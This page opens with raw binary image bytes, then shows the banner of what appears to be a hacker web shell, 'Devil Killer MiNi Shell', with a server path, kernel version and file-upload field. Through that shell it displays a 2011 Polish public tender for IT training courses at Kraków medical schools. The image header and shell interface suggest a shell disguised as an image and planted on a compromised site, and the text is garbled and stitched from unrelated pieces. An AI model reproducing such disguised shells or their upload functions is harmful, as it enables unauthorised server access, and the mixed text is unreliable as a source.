JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/340292-N-2011.html

<p class="kh_header"><b>Kraków: Zorganizowanie  i przeprowadzenie kursów obsługi specjalistycznych programów informatycznych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 340292 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 6442872, 501642173, faks 12 6449997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsmis3.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie  i przeprowadzenie kursów obsługi specjalistycznych programów informatycznych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/. Przedmiotem niniejszego postępowania jest zorganizowanie i przeprowadzenie kursu pn. Kurs Obsługi Programu KS Apteka w  Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków oraz zorganizowanie  i przeprowadzenie kursu informatycznego w zawodzie ratownik medyczny w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3, os. Teatralne 4a, 31-945 Kraków  w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2/. Kurs pn.  Kurs Obsługi Programu KS Apteka Przedmiotem  części I postępowania jest zorganizowanie i przeprowadzenie kursu informatycznego z obsługi programu pn. Kurs Obsługi Programu KS Apteka dla czterech 15 osobowych grup szkoleniowych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.
3/. Kurs informatyczny w zawodzie ratownik medyczny - obsługa programów informatycznych w CPR, Pogotowiu Ratunkowym i SOR w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3. Przedmiotem części II zamówienia jest organizacja i realizacja kursu informatycznego - obsługa programów informatycznych w CPR, Pogotowiu Ratunkowym i SOR, dla  trzech grup po 10 osób każda - łącznie 30 osób, po 36 godzin dla każdej z grup - łącznie 108 godzin, w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3, os. Teatralne 4a, 31-945 Kraków, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim potencjałem technicznym Zamawiający uzna Wykonawców, którzy:
w części I: dysponują aktualizacją oprogramowania KS Apteka,
w części II: dysponują specjalistycznym oprogramowaniem informatycznym, obowiązującym w Centrum Powiadamiania Ratunkowego, Pogotowiu Ratunkowym i Szpitalnym Oddziale Ratunkowym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują dla: 
części I zamówienia co najmniej po jednej osobie posiadającej kwalifikacje pedagogiczne, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli(...) Dz.U. nr 50, poz. 400. Osoba ta musi posiadać minimum 2 letnie doświadczenie w pracy z programem KS Apteka, znajomość konfiguracji programu aptecznego do obsługi w trybie domenowym, znajomość przepisów i zagadnień dotyczących rozliczeń z NFZ.
części II zamówienia co najmniej dwoma osobami posiadającymi min. 2 letnie  doświadczenie w prowadzeniu kursów dla średniego i wyższego personelu medycznego, zatrudnionego w jednostkach systemu ratowniczego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program(opis) kursu, odpowiednio dla danej części</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/.Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy, 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsmis3.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2011 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie kursu obsługi programu informatycznego KS Apteka w Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1/.Kurs pn.  Kurs Obsługi Programu KS Apteka

Przedmiotem niniejszego części postępowania jest zorganizowanie               i przeprowadzenie kursu informatycznego z obsługi programu pn. Kurs Obsługi Programu KS Apteka dla czterech 15 osobowych grup szkoleniowych w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.

2/. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:


Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć praktycznych             i ćwiczeniowych) oraz koszty aktualizacji istniejącego w pracowni komputerowej KMSP Nr 1 w Krakowie oprogramowania KS Apteka, a także  koszt materiałów szkoleniowych dla każdego uczestnika kursu. 

3/. Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do aktualnego oprogramowania umożliwiającego realizację części praktycznej kursu,
b.	zapewnienie aktualnego Pharmindeksu (2 szt.) oraz materiałów do pisania (długopisy, skoroszyty), przechodzących na własność kursantów,
c.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową,
d.	opracowanie i przedłożenie po podpisaniu umowy do akceptacji Przedstawicielowi Zamawiającego - Liderowi Szkolnemu harmonogramu realizacji przedmiotu umowy,
e.	zorganizowanie i przeprowadzenie po zakończeniu kursu dla każdej z grup testu sprawdzającego poziom umiejętności obsługi przez kursanta programu KS Apteka.
4/. W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL.
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
5/. Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
b.	program kursu oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem,
e.	protokół z przeprowadzonego testu sprawdzającego poziom umiejętności obsługi przez kursanta programu KS Apteka.

Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

6/. Ramowy program kursu:
Program kursu obejmuje łącznie 72 godziny lekcyjne (godzina lekcyjna to 45 min.) dla 60 osób podzielonych na cztery piętnastoosobowe grupy.  Program kursu musi obejmować 24 godziny teoretyczne i 48 godzin praktycznych.
Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, OBEJMUJĄCY MIĘDZY INNYMI NIŻEJ WYMIENIONE ZAGADNIENIA:
a/. Wiadomości ogólne dot. Programu KS Apteka  (omówienie modułów, funkcji programu, zasad działania)
b/. Moduł: Sprzedaż (ekspedycja leków, karty pacjentów, faktury VAT, zamówienia, składanie leków robionych, ekspedycja)
c/. Moduł: Zakupy (wprowadzanie towaru, zakładanie kart, kody kreskowe) 
d/. Moduł: Magazyn (aktualizacje, przeceny, remanent )
e/. Moduł: Zestawienia (kontrola recept, leków, poprawa kodów)
7/. Czas trwania kursu:  72 godziny (18 godzin dla każdej z grup), przy czym przez 1 godzinę trwania kursu Zamawiający rozumie   godzinę lekcyjną(45 minut). Kurs może trwać max. 3 godziny dziennie z 2 przerwami min. 5 minutowymi 
Wykonawca dostarczy Zamawiającemu program szkolenia, obejmujący co najmniej 6 godzin teoretycznych  i 12 godzin praktycznych dla każdego uczestnika. 
  
8/. Liczba uczestników kursu: 60 osób podzielone na 4 grupy 15 osobowe. 

Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.

9/. Czas realizacji: od listopada do 15 grudnia 2011 r.
Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego -Liderem Szkolnym po podpisaniu umowy.
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. 

10/. Umowa będzie realizowana  w  Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58.
Zamawiający udostępnia bezpłatnie salę wykładową (wyposażoną w sprzęt komputerowy) w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie kursu informatycznego w zawodzie ratownik medyczny w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3, os. Teatralne 4a, 31-945 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1/. Kurs informatyczny w zawodzie ratownik medyczny - obsługa programów informatycznych w CPR, Pogotowiu Ratunkowym i SOR w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3.

2/. Przedmiotem zamówienia jest organizacja i realizacja kursu informatycznego - obsługa programów informatycznych w CPR, Pogotowiu Ratunkowym i SOR, dla  trzech grup po 10 osób każda - łącznie 30 osób, po 36 godzin dla każdej z grup - łącznie 108 godzin, w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3, os. Teatralne 4a, 31-945 Kraków, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.

3/. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia: 


Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć teoretycznych             i ćwiczeniowych), koszt wyposażenia specjalistycznego koniecznego do przeprowadzenia ww. kursu, koszt materiałów szkoleniowych dla każdego uczestnika kursu. 

4/. Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie każdemu uczestnikowi kursu dostępu do indywidualnego stanowiska komputerowego z oprogramowaniem właściwym dla przedmiotu zamówienia,
b.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową,
c.	realizacja przedmiotu umowy zgodnie z przedłożonym przez Przedstawiciela Zamawiającego - Lidera Szkolnego harmonogramem,
d.	zorganizowanie i przeprowadzenie egzaminu wewnętrznego, sprawdzającego poziom umiejętności obsługi przez kursanta programów informatycznych zainstalowanych w CPR, Pogotowiu Ratunkowym i SOR. 
5/. W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL.
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
6/. Wykonawca po zakończeniu kursu dla każdej z 3 grup przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,
b.	program kursu oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	protokół z egzaminu wewnętrznego, będący podstawą do wystawienia zaświadczenia o ukończeniu kursu,
e.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem. 
Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.
7/. Ramowy program kursu: Program kursu obejmuje 36 godzin dla każdej grupy 10 osobowej, 

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego  PROGRAM KURSU, załączony do oferty, obejmujący niżej wymienione zagadnienia:

Program szkolenia winien zawierać treści merytoryczne kursu informatycznego w zawodzie ratownik medyczny - obsługę programów informatycznych w CPR, Pogotowiu Ratunkowym i SOR ( wprowadzanie zgłoszeń o wypadku i/lub zachorowaniu, transmisja danych do podstacji PR, przygotowanie i wydruk karty pacjenta oraz karty przekazania pacjenta, wprowadzanie danych pacjenta do systemu w obrębie SOR).
8/. Czas trwania kursu: łącznie 108 godzin /przez godzinę rozumiemy jednostkę lekcyjną 45 min/, po 36 godzin dla każdej grupy, w terminie od listopada 2011r. do 28 czerwca 2012r., uwzględniając organizację roku szkolnego, nie więcej niż 6 godzin tygodniowo.
9/. Liczba uczestników kursu: 30 osób  podzielonych na 3 grupy po 10 osób każda.
10/. Czas realizacji: od listopada do 28 czerwca 2012 r.
Część II zamówienia będzie realizowana w trzech etapach (łączna liczba godzin 108):
I etap zostanie zrealizowany w terminie od dnia podpisania umowy do 20 grudnia 2011 r. i będzie obejmował 36 godzin kursu dla pierwszej grupy 10-cio osobowej.
II etap kursu obejmuje:
- 36 godzin kursu dla drugiej grupy 10-cio osobowej w terminie od 02.01.2012 do 31.03.2012r.
III etap kursu obejmuje:
- 36 godzin kursu dla trzeciej grupy 10-cio osobowej w terminie od
01.04.2012 do 28.06.2012r.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 
Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. 

11/. Umowa będzie realizowana w Zespole Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie - Szkole Policealnej Pracowników Służb Medycznych i Społecznych nr 3, os. Teatralne 4a, 31-945 Kraków

